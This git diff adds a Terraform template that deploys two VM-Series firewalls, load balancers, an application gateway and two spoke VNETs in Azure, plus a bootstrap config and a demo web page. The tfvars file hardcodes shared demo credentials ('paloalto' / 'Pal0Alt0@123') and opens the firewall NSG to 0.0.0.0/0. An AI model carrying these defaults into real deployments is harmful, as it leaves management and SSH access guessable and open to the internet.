@@ -0,0 +1,129 @@
+variable location {
+ description = "Enter a location"
+}
+
+variable fw_prefix {
+ description = "Prefix to add to all resources added in the firewall resource group"
+ default = ""
+}
+
+variable fw_license {
+ description = "VM-Series license: byol, bundle1, or bundle2"
+ # default = "byol"
+ # default = "bundle1"
+ # default = "bundle2"
+}
+
+variable global_prefix {
+ description = "Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription"
+}
+#-----------------------------------------------------------------------------------------------------------------
+# Transit VNET variables
+
+variable transit_prefix {
+}
+
+variable transit_vnet_cidr {
+}
+
+variable transit_subnet_names {
+ type = list(string)
+}
+
+variable transit_subnet_cidrs {
+ type = list(string)
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# VM-Series variables
+
+variable fw_count {
+}
+
+variable fw_nsg_prefix {
+}
+
+variable fw_panos {
+}
+
+variable fw_username {
+}
+
+variable fw_password {
+}
+
+variable fw_internal_lb_ip {
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Spoke variables
+
+variable spoke_username {
+}
+
+variable spoke_password {
+}
+
+variable spoke_udrs {
+}
+
+variable spoke1_prefix {
+ description = "Prefix to add to all resources added in spoke1's resource group"
+}
+
+variable spoke1_vm_count {
+}
+
+variable spoke1_vnet_cidr {
+}
+
+variable spoke1_subnet_cidrs {
+ type = list(string)
+}
+
+variable spoke1_internal_lb_ip {
+}
+
+variable spoke2_prefix {
+ description = "Prefix to add to all resources added in spoke2's resource group"
+}
+
+variable spoke2_vm_count {
+}
+
+variable spoke2_vnet_cidr {
+}
+
+variable spoke2_subnet_cidrs {
+ type = list(string)
+}
+
+variable tags {
+ description = "The tags to associate with newly created resources"
+ type = map(string)
+
+ default = {}
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Azure environment variables
+
+variable client_id {
+ description = "Azure client ID"
+ default = ""
+}
+
+variable client_secret {
+ description = "Azure client secret"
+ default = ""
+}
+
+variable subscription_id {
+ description = "Azure subscription ID"
+ default = ""
+}
+
+variable tenant_id {
+ description = "Azure tenant ID"
+ default = ""
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf
new file mode 100644
index 00000000..c66ebfe6
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/README.md b/azure/transit_2fw_2spoke_common_appgw/README.md
new file mode 100644
index 00000000..01101669
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/README.md
@@ -0,0 +1,60 @@
+# 2 x VM-Series / Public LB / Internal LB / AppGW / 2 x Spoke VNETs
+
+This is an extension of the Terraform template located at [**transit_2fw_2spoke_common**](https://github.com/wwce/terraform/tree/master/azure/transit_2fw_2spoke_common).
+
+Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer or an application gateway (both are deployed). The Application Gateway is configured to load balance HTTP traffic on port 80.
+
+N.B. - The template can take 15+ minutes to complete due to the Application Gateway deployment time. When complete, the FQDN of the Application Gateway is included in the output.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+
+
+## Prerequistes
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following **BASH ONLY!**.
+```
+# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2)
+$ az vm image terms accept --urn paloaltonetworks:vmseries1::9.0.1
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1.
+
+```
+$ vi terraform.tfvars
+```
+
+
+Your terraform.tfvars should look like this before proceeding
+
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml
new file mode 100644
index 00000000..47185aa0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml
@@ -0,0 +1,1058 @@
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+ fw1
+
+
+
+ yes
+
+
+ FQDN
+
+ fw1
+ paloalto
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+
+
+
+ yes
+
+
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+ no
+
+ allow-health-probe
+
+ no
+
+
+ yes
+ no
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ no
+ yes
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+ no
+
+
+
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.1.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ trust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ 10
+ 10
+ 30
+ 110
+ 30
+ 110
+ 200
+ 20
+ 120
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 168.63.129.16/32
+
+
+
+
+
+
+ untrust-vr
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ 10
+ 0.0.0.0/0
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.1.0.0/16
+
+
+
+
+
+
+ 10.0.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/2
+ 10
+ 10.2.0.0/16
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+ no
+
+
+
+
+ ethernet1/1
+
+
+ no
+
+
+
+
+
+ ethernet1/2
+ ethernet1/1
+ vlan
+ loopback
+ tunnel
+
+
+
+ untrust-vr
+ trust-vr
+
+
+
+
+
+
+
+
+
+
+ 22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ untrust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ ssh
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+ universal
+
+ trust
+
+
+ trust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ spoke1-vnet
+ spoke2-vnet
+
+ no
+
+ ping
+ ssh
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+ universal
+
+ trust
+
+
+ untrust
+
+
+ no
+
+ any
+
+
+ any
+
+
+ any
+
+ no
+
+ apt-get
+ ntp
+ ping
+ ssl
+ web-browsing
+
+
+ application-default
+
+
+ any
+
+ allow
+ no
+ yes
+ no
+ no
+
+
+
+
+
+
+
+ deny
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+ no
+ This NAT policy prevents the public load balancer's health probes from being NATed.
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ service-http
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke1-intlb
+ 80
+
+ NATs inbound request to internal LB in spoke1
+
+
+ ipv4
+
+ untrust
+
+
+ untrust
+
+ ethernet1/1
+ tcp-22
+
+
+ any
+
+ no
+
+
+
+ ethernet1/2
+
+
+
+
+ spoke2-vm
+ 22
+
+ NATs inbound request to jump server in Spoke 1.
+
+
+ ipv4
+
+ trust
+
+
+ untrust
+
+ any
+ any
+
+
+ any
+
+
+
+
+ ethernet1/1
+
+
+
+ no
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 168.63.129.16/32
+
+ azure-resource
+
+
+
+ 10.1.0.4
+
+ azure-resource
+
+
+
+ 10.2.0.4
+
+ azure-resource
+
+
+
+ 10.1.0.0/16
+
+ azure-resource
+
+
+
+ 10.2.0.0/16
+
+ azure-resource
+
+
+
+ 10.1.0.100
+
+ azure-resource
+
+
+
+
+
+
+
+
+
+
+
+
+ color20
+
+
+ color13
+
+
+ color24
+
+
+ color22
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ *
+
+
+ yes
+
+
+
+
+ $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1
+
+
+ yes
+
+
+
+
+
+ yes
+ 8
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt
new file mode 100644
index 00000000..44878949
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt
@@ -0,0 +1,9 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes
new file mode 100644
index 00000000..e69de29b
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_common.tf b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf
new file mode 100644
index 00000000..e35b4dd1
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf
@@ -0,0 +1,134 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create resource group for FWs, FW NICs, and FW LBs
+
+resource "azurerm_resource_group" "common_fw" {
+ name = "${var.global_prefix}-${var.fw_prefix}-rg"
+ location = var.location
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create storage account and file share for bootstrapping
+
+resource "random_string" "main" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_account" "main" {
+ name = random_string.main.result
+ account_tier = "Standard"
+ account_replication_type = "LRS"
+ location = azurerm_resource_group.common_fw.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+module "common_fileshare" {
+ source = "./modules/azure_bootstrap/"
+ name = "${var.fw_prefix}-bootstrap"
+ quota = 1
+ storage_account_name = azurerm_storage_account.main.name
+ storage_account_key = azurerm_storage_account.main.primary_access_key
+ local_file_path = "bootstrap_files/"
+}
+
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series. For every fw_name entered, an additional VM-Series instance will be deployed.
+
+module "common_fw" {
+ source = "./modules/vmseries/"
+ name = "${var.fw_prefix}-vm"
+ vm_count = var.fw_count
+ username = var.fw_username
+ password = var.fw_password
+ panos = var.fw_panos
+ license = var.fw_license
+ nsg_prefix = var.fw_nsg_prefix
+ avset_name = "${var.fw_prefix}-avset"
+ subnet_mgmt = module.vnet.vnet_subnets[0]
+ subnet_untrust = module.vnet.vnet_subnets[1]
+ subnet_trust = module.vnet.vnet_subnets[2]
+ nic0_public_ip = true
+ nic1_public_ip = true
+ nic2_public_ip = false
+ nic1_backend_pool_ids = [module.common_extlb.backend_pool_id]
+ nic2_backend_pool_ids = [module.common_intlb.backend_pool_id]
+ bootstrap_storage_account = azurerm_storage_account.main.name
+ bootstrap_access_key = azurerm_storage_account.main.primary_access_key
+ bootstrap_file_share = module.common_fileshare.file_share_name
+ bootstrap_share_directory = "None"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+ dependencies = [
+ module.common_fileshare.completion
+ ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool.
+
+module "common_extlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-public-lb"
+ type = "public"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [80, 22, 443]
+ backend_ports = [80, 22, 443]
+ protocol = "Tcp"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool
+
+module "common_intlb" {
+ source = "./modules/lb/"
+ name = "${var.fw_prefix}-internal-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [22]
+ frontend_ports = [0]
+ backend_ports = [0]
+ protocol = "All"
+ subnet_id = module.vnet.vnet_subnets[2]
+ private_ip_address = var.fw_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+}
+
+# Create Application Gateway. Load balancer uses firewall's untrust interface IPs as its backend pool
+
+module "common_appgw" {
+ source = "./modules/appgw/"
+ location = var.location
+ resource_group_name = azurerm_resource_group.common_fw.name
+ subnet_appgw = module.vnet.vnet_subnets[3]
+ fw_private_ips = module.common_fw.nic1_private_ip
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Outputs to terminal
+
+output AppGW {
+ value = "http://${module.common_appgw.appgw_fqdn}"
+}
+
+output EXT-LB {
+ value = "http://${module.common_extlb.public_ip[0]}"
+}
+
+output MGMT-FW1 {
+ value = "https://${module.common_fw.nic0_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+ value = "https://${module.common_fw.nic0_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE2 {
+ value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}"
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf
new file mode 100644
index 00000000..4ee6701d
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf
@@ -0,0 +1,16 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create Transit VNET
+resource "azurerm_resource_group" "transit" {
+ name = "${var.global_prefix}-${var.transit_prefix}-rg"
+ location = var.location
+}
+
+module "vnet" {
+ source = "./modules/vnet/"
+ name = "${var.transit_prefix}-vnet"
+ address_space = var.transit_vnet_cidr
+ subnet_names = var.transit_subnet_names
+ subnet_prefixes = var.transit_subnet_cidrs
+ location = var.location
+ resource_group_name = azurerm_resource_group.transit.name
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/images/diagram.png b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png
new file mode 100644
index 00000000..45f1d146
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png
new file mode 100644
index 00000000..afd57343
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf
new file mode 100644
index 00000000..202714da
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf
@@ -0,0 +1,75 @@
+#### AppGW2 ####
+resource "random_id" "storage_account" {
+ byte_length = 2
+}
+
+resource "azurerm_public_ip" "appgw" {
+ name = "appgw"
+ location = var.location
+ resource_group_name = var.resource_group_name
+ domain_name_label = "appgw-${lower(random_id.storage_account.hex)}"
+ allocation_method = "Dynamic"
+}
+
+resource "azurerm_application_gateway" "appgw" {
+ name = "appgw"
+ location = var.location
+ resource_group_name = var.resource_group_name
+
+ sku {
+ name = "WAF_Medium"
+ tier = "WAF"
+ capacity = 2
+ }
+
+ waf_configuration {
+ enabled = "true"
+ firewall_mode = "Prevention"
+ rule_set_type = "OWASP"
+ rule_set_version = "3.0"
+ }
+
+ gateway_ip_configuration {
+ name = "appgw"
+ subnet_id = var.subnet_appgw
+ }
+
+ frontend_port {
+ name = "http"
+ port = 80
+ }
+
+ frontend_ip_configuration {
+ name = "appgw"
+ public_ip_address_id = azurerm_public_ip.appgw.id
+ }
+
+ backend_address_pool {
+ name = "BackendPool"
+ ip_addresses = var.fw_private_ips
+
+ }
+
+ http_listener {
+ name = "http"
+ frontend_ip_configuration_name = "appgw"
+ frontend_port_name = "http"
+ protocol = "Http"
+ }
+
+ backend_http_settings {
+ name = "http"
+ cookie_based_affinity = "Disabled"
+ port = 80
+ protocol = "Http"
+ request_timeout = 1
+ }
+
+ request_routing_rule {
+ name = "http"
+ rule_type = "Basic"
+ http_listener_name = "http"
+ backend_address_pool_name = "BackendPool"
+ backend_http_settings_name = "http"
+ }
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf
new file mode 100644
index 00000000..97cb2d85
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf
@@ -0,0 +1,3 @@
+output appgw_fqdn {
+ value = azurerm_public_ip.appgw.fqdn
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf
new file mode 100644
index 00000000..c3dbfab8
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf
@@ -0,0 +1,17 @@
+variable "location" {
+ description = "Location of the resource group to place App Gateway in."
+}
+
+variable "resource_group_name" {
+ description = "Name of the resource group to place App Gateway in."
+}
+
+variable "subnet_appgw" {
+ description = "AppGW Subnet"
+}
+
+variable "fw_private_ips" {
+ description = "list of private IP addresses from the deployed FW"
+ type = list(string)
+ default = null
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf
new file mode 100644
index 00000000..1a5c1f7a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf
@@ -0,0 +1,40 @@
+
+
+resource "random_string" "randomstring" {
+ length = 15
+ min_lower = 5
+ min_numeric = 10
+ special = false
+}
+
+resource "azurerm_storage_share" "main" {
+ name = "${var.name}${random_string.randomstring.result}"
+ storage_account_name = var.storage_account_name
+ quota = var.quota
+}
+
+resource "null_resource" "upload" {
+provisioner "local-exec" {
+ command = <
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl
new file mode 100644
index 00000000..1d02e945
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl
@@ -0,0 +1,10 @@
+#cloud-config
+
+runcmd:
+ - sudo apt-get update -y
+ - sudo apt-get install -y php
+ - sudo apt-get install -y apache2
+ - sudo apt-get install -y libapache2-mod-php
+ - sudo rm -f /var/www/html/index.html
+ - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
+ - sudo systemctl restart apache2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/spokes.tf b/azure/transit_2fw_2spoke_common_appgw/spokes.tf
new file mode 100644
index 00000000..a4bf874b
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/spokes.tf
@@ -0,0 +1,97 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs
+
+resource "azurerm_resource_group" "spoke1_rg" {
+ name = "${var.global_prefix}-${var.spoke1_prefix}-rg"
+ location = var.location
+}
+
+module "spoke1_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke1_prefix}-vnet"
+ address_space = var.spoke1_vnet_cidr
+ subnet_prefixes = var.spoke1_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+data "template_file" "web_startup" {
+ template = "${file("${path.module}/scripts/web_startup.yml.tpl")}"
+}
+
+module "spoke1_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke1_prefix}-vm"
+ vm_count = var.spoke1_vm_count
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ backend_pool_ids = [module.spoke1_lb.backend_pool_id]
+ custom_data = base64encode(data.template_file.web_startup.rendered)
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+module "spoke1_lb" {
+ source = "./modules/lb/"
+ name = "${var.spoke1_prefix}-lb"
+ type = "private"
+ sku = "Standard"
+ probe_ports = [80]
+ frontend_ports = [80]
+ backend_ports = [80]
+ protocol = "Tcp"
+ enable_floating_ip = false
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ private_ip_address = var.spoke1_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke2 resource group, spoke2 VNET, spoke2 VM
+
+resource "azurerm_resource_group" "spoke2_rg" {
+ name = "${var.global_prefix}-${var.spoke2_prefix}-rg"
+ location = var.location
+}
+
+module "spoke2_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke2_prefix}-vnet"
+ address_space = var.spoke2_vnet_cidr
+ subnet_prefixes = var.spoke2_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
+
+module "spoke2_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke2_prefix}-vm"
+ vm_count = var.spoke2_vm_count
+ subnet_id = module.spoke2_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars
new file mode 100644
index 00000000..3304b1e6
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars
@@ -0,0 +1,43 @@
+#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license = "bundle1"
+#fw_license = "bundle2"
+
+global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription
+location = "centralus"
+
+# -----------------------------------------------------------------------
+# VM-Series resource group variables
+
+fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group
+fw_count = 2
+fw_panos = "9.0.1"
+fw_nsg_prefix = "0.0.0.0/0"
+fw_username = "paloalto"
+fw_password = "Pal0Alt0@123"
+fw_internal_lb_ip = "10.0.2.100"
+
+# -----------------------------------------------------------------------
+# Transit resource group variables
+
+transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group
+transit_vnet_cidr = "10.0.0.0/16"
+transit_subnet_names = ["mgmt", "untrust", "trust","gateway"]
+transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+
+# -----------------------------------------------------------------------
+# Spoke resource group variables
+
+spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group
+spoke1_vm_count = 2
+spoke1_vnet_cidr = "10.1.0.0/16"
+spoke1_subnet_cidrs = ["10.1.0.0/24"]
+spoke1_internal_lb_ip = "10.1.0.100"
+
+spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group
+spoke2_vm_count = 1
+spoke2_vnet_cidr = "10.2.0.0/16"
+spoke2_subnet_cidrs = ["10.2.0.0/24"]
+
+spoke_username = "paloalto"
+spoke_password = "Pal0Alt0@123"
